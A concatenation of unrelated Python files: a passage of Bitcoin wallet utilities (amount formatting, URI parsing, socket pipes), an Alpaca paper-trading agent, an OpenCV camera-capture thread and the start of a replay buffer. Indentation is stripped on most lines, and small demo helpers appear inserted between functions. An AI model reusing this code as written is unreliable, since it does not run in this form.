fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
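# Hedged worked example for the two formatters above (demo only; assumes a locale
# whose decimal point is '.').
def _format_examples():
    """Print a few formatted amounts, e.g. 1234500000 satoshis -> '12.345' BTC."""
    print(format_satoshis_plain(1234500000))          # '12.345'
    print(format_satoshis(1234500000, is_diff=True))  # '+12.345'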
def timestamp_to_datetime(timestamp):
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Biteasy.com': ('https://www.biteasy.com/blockchain',
{'tx': 'transactions', 'addr': 'addresses'}),
'Bitflyer.jp': ('https://chainflyer.bitflyer.jp',
{'tx': 'Transaction', 'addr': 'Address'}),
'Blockchain.info': ('https://blockchain.info',
{'tx': 'tx', 'addr': 'address'}),
'blockchainbdgpzk.onion': ('https://blockchainbdgpzk.onion',
{'tx': 'tx', 'addr': 'address'}),
'Blockr.io': ('https://btc.blockr.io',
{'tx': 'tx/info', 'addr': 'address/info'}),
'Blocktrail.com': ('https://www.blocktrail.com/BTC',
{'tx': 'tx', 'addr': 'address'}),
'BTC.com': ('https://chain.btc.com',
{'tx': 'tx', 'addr': 'address'}),
'Chain.so': ('https://www.chain.so',
{'tx': 'tx/BTC', 'addr': 'address/BTC'}),
'Insight.is': ('https://insight.bitpay.com',
{'tx': 'tx', 'addr': 'address'}),
'TradeBlock.com': ('https://tradeblock.com/blockchain',
{'tx': 'tx', 'addr': 'address'}),
'BlockCypher.com': ('https://live.blockcypher.com/btc',
{'tx': 'tx', 'addr': 'address'}),
'Blockchair.com': ('https://blockchair.com/bitcoin',
{'tx': 'transaction', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
testnet_block_explorers = {
'Blocktrail.com': ('https://www.blocktrail.com/tBTC',
{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
def block_explorer_info():
from . import bitcoin
return testnet_block_explorers if bitcoin.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'Blocktrail.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a bitcoin address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'bitcoin':
raise BaseException("Not a bitcoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid bitcoin address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
        m = re.match(r'([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
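# Hedged worked example for parse_URI above (demo only). `addr` must be a valid
# Bitcoin address for the call to succeed; with
# 'bitcoin:<addr>?amount=0.001&message=coffee' the result is roughly
# {'address': '<addr>', 'amount': 100000, 'message': 'coffee', 'memo': 'coffee'}.
def _parse_uri_example(addr):
    """Parse a BIP21-style URI built from a known-good address."""
    return parse_URI('bitcoin:%s?amount=0.001&message=coffee' % addr)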
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import errno
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except socket.error as e:
if e[0] in (errno.EWOULDBLOCK,errno.EAGAIN):
print_error("EAGAIN: retrying")
time.sleep(0.1)
continue
elif e[0] in ['timed out', 'The write operation timed out']:
print_error("socket timeout, retry")
time.sleep(0.1)
continue
else:
traceback.print_exc(file=sys.stdout)
raise e
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
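# Hedged sketch (demo only): two QueuePipes can be cross-wired so that whatever
# one side sends the other receives, which is handy for in-process client/server
# tests without sockets.
def _make_pipe_pair():
    """Return (client, server) QueuePipes sharing a pair of queues."""
    a_to_b, b_to_a = queue.Queue(), queue.Queue()
    client = QueuePipe(send_queue=a_to_b, get_queue=b_to_a)
    server = QueuePipe(send_queue=b_to_a, get_queue=a_to_b)
    # client.send({'method': 'ping'}); server.get() -> {'method': 'ping'}
    return client, server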
def check_www_dir(rdir):
import urllib, shutil, os
if not os.path.exists(rdir):
os.mkdir(rdir)
index = os.path.join(rdir, 'index.html')
if not os.path.exists(index):
print_error("copying index.html")
src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
shutil.copy(src, index)
files = [
"https://code.jquery.com/jquery-1.9.1.min.js",
"https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
"https://code.jquery.com/ui/1.10.3/jquery-ui.js",
"https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
]
for URL in files:
path = urllib.parse.urlsplit(URL).path
filename = os.path.basename(path)
path = os.path.join(rdir, filename)
if not os.path.exists(path):
print_error("downloading ", URL)
urllib.request.urlretrieve(URL, path)
|
env_stock_papertrading_sb3.py
|
import datetime
import threading
import time
import alpaca_trade_api as tradeapi
import numpy as np
import pandas as pd
from finrl_meta.data_processors.alpaca import Alpaca
class AlpacaPaperTrading_sb3():
def __init__(self, ticker_list, time_interval, agent, cwd, net_dim,
state_dim, action_dim, API_KEY, API_SECRET,
API_BASE_URL, tech_indicator_list, turbulence_thresh=30, max_stock=1e2):
# load agent
if agent == 'ppo':
from stable_baselines3 import PPO
try:
# load agent
self.model = PPO.load(cwd)
print("Successfully load model", cwd)
except:
raise ValueError('Fail to load agent!')
else:
raise ValueError('Agent input is NOT supported yet.')
# connect to Alpaca trading API
try:
self.alpaca = tradeapi.REST(API_KEY, API_SECRET, API_BASE_URL, 'v2')
except:
raise ValueError('Fail to connect Alpaca. Please check account info and internet connection.')
# read trading time interval
if time_interval == '1s':
self.time_interval = 1
elif time_interval == '5s':
self.time_interval = 5
elif time_interval == '1Min':
self.time_interval = 60
elif time_interval == '5Min':
self.time_interval = 60 * 5
elif time_interval == '15Min':
self.time_interval = 60 * 15
else:
raise ValueError('Time interval input is NOT supported yet.')
# read trading settings
self.tech_indicator_list = tech_indicator_list
self.turbulence_thresh = turbulence_thresh
self.max_stock = max_stock
# initialize account
self.stocks = np.asarray([0] * len(ticker_list)) # stocks holding
self.stocks_cd = np.zeros_like(self.stocks)
self.cash = None # cash record
self.stocks_df = pd.DataFrame(self.stocks, columns=['stocks'], index=ticker_list)
self.asset_list = []
self.price = np.asarray([0] * len(ticker_list))
self.stockUniverse = ticker_list
self.turbulence_bool = 0
self.equities = []
def run(self):
orders = self.alpaca.list_orders(status="open")
for order in orders:
self.alpaca.cancel_order(order.id)
# Wait for market to open.
print("Waiting for market to open...")
tAMO = threading.Thread(target=self.awaitMarketOpen)
tAMO.start()
tAMO.join()
print("Market opened.")
while True:
# Figure out when the market will close so we can prepare to sell beforehand.
clock = self.alpaca.get_clock()
closingTime = clock.next_close.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
self.timeToClose = closingTime - currTime
if (self.timeToClose < (60)):
                # Stop trading when less than 1 minute remains until market close.
print("Market closing soon. Stop trading.")
break
'''# Close all positions when 1 minutes til market close.
print("Market closing soon. Closing positions.")
positions = self.alpaca.list_positions()
for position in positions:
if(position.side == 'long'):
orderSide = 'sell'
else:
orderSide = 'buy'
qty = abs(int(float(position.qty)))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder(qty, position.symbol, orderSide, respSO))
tSubmitOrder.start()
tSubmitOrder.join()
# Run script again after market close for next trading day.
print("Sleeping until market close (15 minutes).")
time.sleep(60 * 15)'''
else:
trade = threading.Thread(target=self.trade)
trade.start()
trade.join()
last_equity = float(self.alpaca.get_account().last_equity)
cur_time = time.time()
self.equities.append([cur_time, last_equity])
np.save('paper_trading_records.npy', np.asarray(self.equities, dtype=float))
time.sleep(self.time_interval)
def awaitMarketOpen(self):
isOpen = self.alpaca.get_clock().is_open
while (not isOpen):
clock = self.alpaca.get_clock()
openingTime = clock.next_open.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
timeToOpen = int((openingTime - currTime) / 60)
print(str(timeToOpen) + " minutes til market open.")
time.sleep(60)
isOpen = self.alpaca.get_clock().is_open
def trade(self):
state = self.get_state()
action = self.model.predict(state)[0]
action = (action * self.max_stock).astype(int)
self.stocks_cd += 1
if self.turbulence_bool == 0:
min_action = 10 # stock_cd
for index in np.where(action < -min_action)[0]: # sell_index:
sell_num_shares = min(self.stocks[index], -action[index])
qty = abs(int(sell_num_shares))
respSO = []
                tSubmitOrder = threading.Thread(target=self.submitOrder, args=(qty, self.stockUniverse[index], 'sell', respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.cash = float(self.alpaca.get_account().cash)
self.stocks_cd[index] = 0
for index in np.where(action > min_action)[0]: # buy_index:
if self.cash < 0:
tmp_cash = 0
else:
tmp_cash = self.cash
buy_num_shares = min(tmp_cash // self.price[index], abs(int(action[index])))
qty = abs(int(buy_num_shares))
respSO = []
                tSubmitOrder = threading.Thread(target=self.submitOrder, args=(qty, self.stockUniverse[index], 'buy', respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.cash = float(self.alpaca.get_account().cash)
self.stocks_cd[index] = 0
else: # sell all when turbulence
positions = self.alpaca.list_positions()
for position in positions:
if (position.side == 'long'):
orderSide = 'sell'
else:
orderSide = 'buy'
qty = abs(int(float(position.qty)))
respSO = []
                tSubmitOrder = threading.Thread(target=self.submitOrder, args=(qty, position.symbol, orderSide, respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.stocks_cd[:] = 0
def get_state(self):
alpaca = Alpaca(api=self.alpaca)
price, tech, turbulence = alpaca.fetch_latest_data(ticker_list=self.stockUniverse, time_interval='1Min',
tech_indicator_list=self.tech_indicator_list)
turbulence_bool = 1 if turbulence >= self.turbulence_thresh else 0
turbulence = (self.sigmoid_sign(turbulence, self.turbulence_thresh) * 2 ** -5).astype(np.float32)
tech = tech * 2 ** -7
positions = self.alpaca.list_positions()
stocks = [0] * len(self.stockUniverse)
for position in positions:
ind = self.stockUniverse.index(position.symbol)
stocks[ind] = (abs(int(float(position.qty))))
stocks = np.asarray(stocks, dtype=float)
cash = float(self.alpaca.get_account().cash)
self.cash = cash
self.stocks = stocks
self.turbulence_bool = turbulence_bool
self.price = price
amount = np.array(max(self.cash, 1e4) * (2 ** -12), dtype=np.float32)
scale = np.array(2 ** -6, dtype=np.float32)
state = np.hstack((amount,
turbulence,
self.turbulence_bool,
price * scale,
self.stocks * scale,
self.stocks_cd,
tech,
)).astype(np.float32)
print(len(self.stockUniverse))
return state
def submitOrder(self, qty, stock, side, resp):
if (qty > 0):
try:
self.alpaca.submit_order(stock, qty, side, "market", "day")
print("Market order of | " + str(qty) + " " + stock + " " + side + " | completed.")
resp.append(True)
except:
print("Order of | " + str(qty) + " " + stock + " " + side + " | did not go through.")
resp.append(False)
else:
print("Quantity is 0, order of | " + str(qty) + " " + stock + " " + side + " | not completed.")
resp.append(True)
@staticmethod
def sigmoid_sign(ary, thresh):
def sigmoid(x):
return 1 / (1 + np.exp(-x * np.e)) - 0.5
return sigmoid(ary / thresh) * thresh
|
cv2capture.py
|
###############################################################################
# OpenCV video capture
# Uses opencv video capture to capture system's camera
# Adapts to operating system and allows configuration of codec
# Urs Utzinger
# 2021 Initialize, Remove Frame access (use only queue)
# 2019 Initial release, based on Bitbuckets FRC 4183 code
###############################################################################
###############################################################################
# Imports
###############################################################################
# Multi Threading
from threading import Thread, Lock
from queue import Queue
# System
import logging, time, sys
# Open Computer Vision
import cv2
###############################################################################
# Video Capture
###############################################################################
class cv2Capture(Thread):
"""
This thread continually captures frames from a camera
"""
# Initialize the Camera Thread
# Opens Capture Device and Sets Capture Properties
############################################################################
def __init__(self, configs,
camera_num: int = 0,
res: tuple = None, # width, height
exposure: float = None):
# populate desired settings from configuration file or function arguments
####################################################################
self.camera_num = camera_num
if exposure is not None:
self._exposure = exposure
else:
self._exposure = configs['exposure']
if res is not None:
self._camera_res = res
else:
self._camera_res = configs['camera_res']
self._output_res = configs['output_res']
self._output_width = self._output_res[0]
self._output_height = self._output_res[1]
self._framerate = configs['fps']
self._flip_method = configs['flip']
self._buffersize = configs['buffersize'] # camera drive buffer size
self._fourcc = configs['fourcc'] # camera sensor encoding format
self._autoexposure = configs['autoexposure'] # autoexposure depends on camera
self.capture = Queue(maxsize=32)
self.log = Queue(maxsize=32)
self.stopped = True
self.cam_lock = Lock()
# open up the camera
self._open_cam()
# Init vars
self.frame_time = 0.0
self.measured_fps = 0.0
Thread.__init__(self)
# Thread routines #################################################
# Start Stop and Update Thread
###################################################################
def stop(self):
"""stop the thread"""
self.stopped = True
# clean up
def start(self):
"""set the thread start conditions"""
self.stopped = False
T = Thread(target=self.update)
T.daemon = True # run in background
T.start()
    # After starting the thread, this runs continuously
def update(self):
"""run the thread"""
last_time = time.time()
num_frames = 0
while not self.stopped:
current_time = time.time()
if self.cam is not None:
with self.cam_lock:
_, img = self.cam.read()
num_frames += 1
self.frame_time = int(current_time*1000)
if (img is not None) and (not self.capture.full()):
if (self._output_height > 0) or (self._flip_method > 0):
# adjust output height
img_resized = cv2.resize(img, self._output_res)
# flip resized image
if self._flip_method == 0: # no flipping
img_proc = img_resized
                        elif self._flip_method == 1: # ccw 90
                            img_proc = cv2.rotate(img_resized, cv2.ROTATE_90_COUNTERCLOCKWISE)
                        elif self._flip_method == 2: # rot 180, same as flip lr & up
                            img_proc = cv2.rotate(img_resized, cv2.ROTATE_180)
                        elif self._flip_method == 3: # cw 90
                            img_proc = cv2.rotate(img_resized, cv2.ROTATE_90_CLOCKWISE)
                        elif self._flip_method == 4: # horizontal
                            img_proc = cv2.flip(img_resized, 0)
                        elif self._flip_method == 5: # upright diagonal. ccw & lr
                            img_proc = cv2.flip(cv2.rotate(img_resized, cv2.ROTATE_90_COUNTERCLOCKWISE), 1)
elif self._flip_method == 6: # vertical
img_proc = cv2.flip(img_resized, 1)
elif self._flip_method == 7: # upperleft diagonal
img_proc = cv2.transpose(img_resized)
else:
img_proc = img_resized # not a valid flip method
else:
img_proc = img
self.capture.put_nowait((self.frame_time, img_proc))
else:
self.log.put_nowait((logging.WARNING, "CV2:Capture Queue is full!"))
# FPS calculation
if (current_time - last_time) >= 5.0: # update frame rate every 5 secs
self.measured_fps = num_frames/5.0
self.log.put_nowait((logging.INFO, "CAM:FPS:{}".format(self.measured_fps)))
last_time = current_time
num_frames = 0
self.cam.release()
# Setup the Camera
############################################################################
def _open_cam(self):
"""
Open up the camera so we can begin capturing frames
"""
# Open the camera with platform optimal settings
if sys.platform.startswith('win'):
self.cam = cv2.VideoCapture(self.camera_num, apiPreference=cv2.CAP_MSMF)
elif sys.platform.startswith('darwin'):
self.cam = cv2.VideoCapture(self.camera_num, apiPreference=cv2.CAP_AVFOUNDATION)
elif sys.platform.startswith('linux'):
self.cam = cv2.VideoCapture(self.camera_num, apiPreference=cv2.CAP_V4L2)
else:
self.cam = cv2.VideoCapture(self.camera_num, apiPreference=cv2.CAP_ANY)
self.cam_open = self.cam.isOpened()
if self.cam_open:
# Apply settings to camera
if self._camera_res[0] > 0:
self.width = self._camera_res[0] # image resolution
if self._camera_res[1] > 0:
self.height = self._camera_res[1] # image resolution
self.autoexposure = self._autoexposure # autoexposure
if self._exposure > 0:
self.exposure = self._exposure # camera exposure
if self._buffersize > 0:
self.buffersize = self._buffersize # camera drive buffer size
if not self._fourcc == -1:
self.fourcc = self._fourcc # camera sensor encoding format
if self._framerate > 0:
self.fps = self._framerate # desired fps
else:
self.log.put_nowait((logging.CRITICAL, "CV2:Failed to open camera!"))
# Camera routines #################################################
# Reading and setting camera options
###################################################################
@property
def width(self):
""" returns video capture width """
if self.cam_open:
return self.cam.get(cv2.CAP_PROP_FRAME_WIDTH)
else: return float("NaN")
@width.setter
def width(self, val):
""" sets video capture width """
if (val is None) or (val == -1):
self.log.put_nowait((logging.WARNING, "CV2:Width not changed:{}".format(val)))
return
if self.cam_open:
with self.cam_lock:
isok = self.cam.set(cv2.CAP_PROP_FRAME_WIDTH, val)
if isok:
self.log.put_nowait((logging.INFO, "CV2:Width:{}".format(val)))
else:
self.log.put_nowait((logging.ERROR, "CV2:Failed to set width to {}!".format(val)))
@property
def height(self):
""" returns videocapture height """
if self.cam_open:
return self.cam.get(cv2.CAP_PROP_FRAME_HEIGHT)
else: return float("NaN")
@height.setter
def height(self, val):
""" sets video capture height """
if (val is None) or (val == -1):
self.log.put_nowait((logging.WARNING, "CV2:Height not changed:{}".format(val)))
return
if self.cam_open:
with self.cam_lock:
isok = self.cam.set(cv2.CAP_PROP_FRAME_HEIGHT, int(val))
if isok:
self.log.put_nowait((logging.INFO, "CV2:Height:{}".format(val)))
else:
self.log.put_nowait((logging.ERROR, "CV2:Failed to set height to {}!".format(val)))
@property
def resolution(self):
""" returns current resolution width x height """
if self.cam_open:
return [self.cam.get(cv2.CAP_PROP_FRAME_WIDTH),
self.cam.get(cv2.CAP_PROP_FRAME_HEIGHT)]
else: return [float("NaN"), float("NaN")]
@resolution.setter
def resolution(self, val):
if val is None: return
if self.cam_open:
if len(val) > 1: # have width x height
with self.cam_lock:
isok0 = self.cam.set(cv2.CAP_PROP_FRAME_WIDTH, int(val[0]))
isok1 = self.cam.set(cv2.CAP_PROP_FRAME_HEIGHT, int(val[1]))
if isok0 and isok1:
self.log.put_nowait((logging.INFO, "CV2:Width:{}".format(val[0])))
self.log.put_nowait((logging.INFO, "CV2:Height:{}".format(val[1])))
else:
self.log.put_nowait((logging.ERROR, "CV2:Failed to set resolution to {},{}!".format(val[0],val[1])))
else: # given only one value for resolution
with self.cam_lock:
isok0 = self.cam.set(cv2.CAP_PROP_FRAME_WIDTH, int(val))
isok1 = self.cam.set(cv2.CAP_PROP_FRAME_HEIGHT, int(val))
if isok0 and isok1:
self.log.put_nowait((logging.INFO, "CV2:Width:{}".format(val)))
self.log.put_nowait((logging.INFO, "CV2:Height:{}".format(val)))
else:
self.log.put_nowait((logging.ERROR, "CV2:Failed to set resolution to {},{}!".format(val,val)))
else: # camera not open
self.log.put_nowait((logging.CRITICAL, "CV2:Failed to set resolution, camera not open!"))
@property
    def exposure(self):
        """ returns current exposure """
if self.cam_open:
return self.cam.get(cv2.CAP_PROP_EXPOSURE)
else: return float("NaN")
@exposure.setter
    def exposure(self, val):
        """ sets current exposure """
self._exposure = val
if (val is None) or (val == -1):
self.log.put_nowait((logging.WARNING, "CV2:Can not set exposure to {}!".format(val)))
return
if self.cam_open:
with self.cam_lock:
isok = self.cam.set(cv2.CAP_PROP_EXPOSURE, self._exposure)
if isok:
self.log.put_nowait((logging.INFO, "CV2:Exposure:{}".format(val)))
else:
                    self.log.put_nowait((logging.ERROR, "CV2:Failed to set exposure to:{}".format(val)))
@property
    def autoexposure(self):
        """ returns current autoexposure setting """
if self.cam_open:
return self.cam.get(cv2.CAP_PROP_AUTO_EXPOSURE)
else: return float("NaN")
@autoexposure.setter
def autoexposure(self, val):
""" sets autoexposure """
if (val is None) or (val == -1):
self.log.put_nowait((logging.WARNING, "CV2:Can not set Autoexposure to:{}".format(val)))
return
if self.cam_open:
with self.cam_lock:
isok = self.cam.set(cv2.CAP_PROP_AUTO_EXPOSURE, val)
if isok:
self.log.put_nowait((logging.INFO, "CV2:Autoexposure:{}".format(val)))
else:
self.log.put_nowait((logging.ERROR, "CV2:Failed to set Autoexposure to:{}".format(val)))
@property
def fps(self):
""" returns current frames per second setting """
if self.cam_open:
return self.cam.get(cv2.CAP_PROP_FPS)
else: return float("NaN")
@fps.setter
def fps(self, val):
""" set frames per second in camera """
if (val is None) or (val == -1):
self.log.put_nowait((logging.WARNING, "CV2:Can not set framerate to:{}".format(val)))
return
if self.cam_open:
with self.cam_lock:
isok = self.cam.set(cv2.CAP_PROP_FPS, val)
if isok:
self.log.put_nowait((logging.INFO, "CV2:FPS:{}".format(val)))
else:
self.log.put_nowait((logging.ERROR, "CV2:Failed to set FPS to:{}".format(val)))
@staticmethod
    def decode_fourcc(val):
        """ decode the fourcc integer to the character string """
return "".join([chr((int(val) >> 8 * i) & 0xFF) for i in range(4)])
@property
def fourcc(self):
""" return video encoding format """
if self.cam_open:
self._fourcc = self.cam.get(cv2.CAP_PROP_FOURCC)
self._fourcc_str = self.decode_fourcc(self._fourcc)
return self._fourcc_str
else: return "None"
@fourcc.setter
def fourcc(self, val):
""" set video encoding format in camera """
if (val is None) or (val == -1):
self.log.put_nowait((logging.WARNING, "CV2:Can not set FOURCC to:{}!".format(val)))
return
if isinstance(val, str): # we need to convert from FourCC to integer
self._fourcc = cv2.VideoWriter_fourcc(val[0],val[1],val[2],val[3])
self._fourcc_str = val
else: # fourcc is integer/long
self._fourcc = val
self._fourcc_str = self.decode_fourcc(val)
if self.cam_open:
with self.cam_lock:
isok = self.cam.set(cv2.CAP_PROP_FOURCC, self._fourcc)
if isok :
self.log.put_nowait((logging.INFO, "CV2:FOURCC:{}".format(self._fourcc_str)))
else:
self.log.put_nowait((logging.ERROR, "CV2:Failed to set FOURCC to:{}".format(self._fourcc_str)))
@property
def buffersize(self):
""" return opencv camera buffersize """
if self.cam_open:
return self.cam.get(cv2.CAP_PROP_BUFFERSIZE)
else: return float("NaN")
@buffersize.setter
def buffersize(self, val):
""" set opencv camera buffersize """
if val is None or val == -1:
self.log.put_nowait((logging.WARNING, "CV2:Can not set buffer size to:{}".format(val)))
return
if self.cam_open:
with self.cam_lock:
isok = self.cam.set(cv2.CAP_PROP_BUFFERSIZE, val)
if isok:
self.log.put_nowait((logging.INFO, "CV2:Buffersize:{}".format(val)))
else:
self.log.put_nowait((logging.ERROR, "CV2:Failed to set buffer size to:{}".format(val)))
###############################################################################
# Testing
###############################################################################
if __name__ == '__main__':
configs = {
'camera_res' : (1920, 1080), # CAP_PROP_FRAME_WIDTH, CAP_PROP_FRAME_HEIGHT
'exposure' : -6, # camera specific e.g. -5 =(2^-5)=1/32, 0 = auto, 1...max=frame interval in microseconds
'autoexposure' : 3.0, # cv2 camera only, depends on camera: 0.25 or 0.75(auto), -1,0,1
'fps' : 30, # 120fps only with MJPG fourcc
'fourcc' : "MJPG", # cv2 camera only: MJPG, YUY2, YUYV
'buffersize' : -1, # default is 4 for V4L2, max 10,
        'fov' : 77, # camera lens field of view in degrees
'output_res' : (-1, -1), # Output resolution
        'flip' : 0, # 0 = no rotation
'displayfps' : 5 # frame rate for display server
}
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger("Capture")
logger.log(logging.DEBUG, "Starting Capture")
camera = cv2Capture(configs,camera_num=0)
camera.start()
logger.log(logging.DEBUG, "Getting Frames")
window_handle = cv2.namedWindow("Camera", cv2.WINDOW_AUTOSIZE)
while(cv2.getWindowProperty("Camera", 0) >= 0):
try:
(frame_time, frame) = camera.capture.get()
cv2.imshow('Camera', frame)
except: pass
if cv2.waitKey(1) & 0xFF == ord('q'): break
try:
(level, msg)=camera.log.get_nowait()
logger.log(level, "CV2:{}".format(msg))
except: pass
camera.stop()
cv2.destroyAllWindows()
|
replay_buffer.py
|
try:
import queue
except:
import Queue as queue
from random import shuffle
from random import seed
seed(123)
from threading import Thread
import numpy as np
import time
import tensorflow as tf
try:
import Queue as Q # ver. < 3.0
except ImportError:
import queue as Q
from sklearn.preprocessing import normalize
PriorityQueue = Q.PriorityQueue
# Custom priority queue that can clear itself once it is full and cut its
# contents in half. Every time the buffer reaches dqn_replay_buffer_size we
# keep the half with the most valuable states and drop the rest to make room
# for new experiences.
class CustomQueue(PriorityQueue):
'''
A custom queue subclass that provides a :meth:`clear` method.
'''
def __init__(self, size):
PriorityQueue.__init__(self, size)
def clear(self):
'''
Clears all items from the queue.
'''
with self.mutex:
unfinished = self.unfinished_tasks - len(self.queue)
if unfinished <= 0:
if unfinished < 0:
raise ValueError('task_done() called too many times')
self.all_tasks_done.notify_all()
            self.queue = self.queue[0:len(self.queue) // 2]
self.unfinished_tasks = unfinished + len(self.queue)
self.not_full.notify_all()
def isempty(self):
with self.mutex:
return len(self.queue) == 0
def isfull(self):
with self.mutex:
return len(self.queue) == self.maxsize
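# Hedged sketch of the clear-to-half behaviour above (demo only): after the queue
# fills up, clear() keeps the first half of the underlying heap list and frees
# space for new items.
def _custom_queue_demo():
    q = CustomQueue(4)
    for v in (3, 1, 4, 2):
        q.put_nowait(v)
    assert q.isfull()
    q.clear()                # keeps len(queue) // 2 == 2 items
    assert not q.isfull()
    return q.qsize()         # -> 2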
class Transition(object):
"""
